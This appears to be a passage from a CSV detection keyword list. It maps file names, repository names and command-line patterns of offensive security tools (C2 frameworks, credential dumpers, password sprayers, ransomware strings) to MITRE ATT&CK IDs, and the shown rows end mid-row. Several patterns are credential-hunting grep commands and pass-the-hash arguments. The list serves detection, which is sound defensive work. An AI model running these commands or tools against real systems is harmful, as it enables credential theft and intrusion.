-*gpg2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*gpoddity.py*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z
-*gpoddity_smbserver.py*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z
-*GPOddity-master*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z
-*GPO-RemoteAccess.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*gpp_autologin.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*gpp_password.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*GPP_Passwords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*gppassword.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-*gpp-decrypt *,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,0,N/A,6,10,N/A,N/A,N/A,N/A
-*gpp-decrypt.py -f groups.xml*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gpp-decrypt.rb*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,1,N/A,6,10,N/A,N/A,N/A,N/A
-*GPSCoordinates.exe*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z
-*Gr1mmie/AtlasC2*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z
-*GrantMailboxAccess.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z
-*GrantSamAccessPermission.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-*GreatSCT*,offensive_tool_keyword,GreatSCT,GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker,T1027 - T1055 - T1566 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z
-*GreatSCT.git*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z
-*GreatSCT.py*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z
-*Greenwolf*,offensive_tool_keyword,Greenwolf,A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.,T2348 - T2349 - T2366 - T2423 - T2597 - T2596,TA0011 - TA0022 - TA0026,N/A,N/A,Information Gathering,https://github.com/Greenwolf/social_mapper,1,0,N/A,N/A,10,3599,797,2022-02-25T18:08:41Z,2018-07-07T14:50:07Z
-*gremwell/o365enum*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z
-*grep -* *DBPassword*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep *password /var/www*,greyware_tool_keyword,grep,search for passwords,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*grep *password.* /etc/*.conf*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep :0: /etc/passwd*,greyware_tool_keyword,grep,Look for users with a UID of 0,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*grep -i pass *,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep -i user *,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://gtfobins.github.io/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep -R db_passwd*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep -roiE *password*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*grep*|pwd=|passwd=|password=*,greyware_tool_keyword,grep,search for passwords,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*grep*password|pwd|pass*,greyware_tool_keyword,grep,search for passwords,T1213 - T1081,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*grep-through-commits.sh *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*Group3r.cs*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z
-*Group3r.exe*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z
-*Group3r/Group3r*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z
-*GruntInjection.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z
-*gruntstager.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z
-*GruntStager.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z
-*gtfobins*,offensive_tool_keyword,gtfobins,GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries,T1059 - T1068 - T1043 - T1136,TA0002 - TA0005,N/A,N/A,POST Exploitation tools,https://gtfobins.github.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*GTFOBLookup*,offensive_tool_keyword,GTFOBLookup,Offline command line lookup utility for GTFOBins and LOLBAS.,T1059 - T1110 - T1216 - T1220,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nccgroup/GTFOBLookup,1,1,N/A,N/A,3,215,40,2023-06-16T22:01:43Z,2019-09-23T16:00:18Z
-*gtworek/Priv2Admin*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z
-*guardicore*monkey*,offensive_tool_keyword,Github Username,Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server,T1566 - T1569 - T1570 - T1571 - T1572 - T1573,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/h0nus,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*guardicore/monkey*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z
-*guida.exe -*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z
-*gunicorn ares:app*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z
-*Gupt-Backdoor.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z
-*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z
-*-H lm-hash:nt-hash*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*-H 'LMHASH:NTHASH'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*-H 'NTHASH'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*h2csmuggler --scan-list *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*h2csmuggler -x * --test*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*h8mail -*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,0,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z
-*h8mail -t *@*.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*h8mail*,offensive_tool_keyword,h8mail,h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/khast3x/h8mail,1,0,N/A,N/A,10,3553,480,2023-08-15T10:50:34Z,2018-06-15T02:47:00Z
-*Ha3MrX/Gemail-Hack*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z
-*haad/proxychains*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z
-*hackbrowersdata.cna*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z
-*hack-browser-data.exe*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z
-*hack-browser-data/*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z
-*HACKER*FUCKER*Xeroxxx*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*hackertarget-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*hackingtool.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z
-*Hackndo/sprayhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Hackndo/sprayhound*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z
-*hackndo@gmail.com*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential
Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Hackplayers/evil-winrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hackrf_sweep -f *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hacksysteam/CVE-2023-*,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*HackTheWorld*,offensive_tool_keyword,HackTheWorld,An Python Script For Generating Payloads that Bypasses All Antivirus so far.,T1566 - T1106 - T1027 - T1059 - T1070,TA0002 - TA0005 - TA0008 - TA0011,N/A,N/A,Defense 